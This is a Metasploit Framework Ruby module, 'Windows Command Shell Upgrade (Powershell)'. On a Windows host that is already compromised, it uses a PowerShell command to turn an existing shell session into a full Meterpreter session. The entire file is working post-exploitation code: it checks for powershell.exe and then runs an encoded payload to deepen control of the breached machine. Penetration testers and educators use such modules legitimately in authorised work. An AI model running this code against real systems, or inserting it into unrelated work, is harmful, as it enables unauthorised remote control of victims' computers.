##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Command Shell Upgrade (Powershell)',
'Description' => %q{
This module executes Powershell to upgrade a Windows Shell session
to a full Meterpreter session.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'shell' ],
'Targets' => [ [ 'Universal', {} ] ],
'DefaultTarget' => 0
))
end
def exploit
psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
if file? "%WINDIR%\\System32#{psh_path}"
print_status("Executing powershell command line...")
cmd_exec(cmd_psh_payload(payload.encoded))
else
fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
end
end
end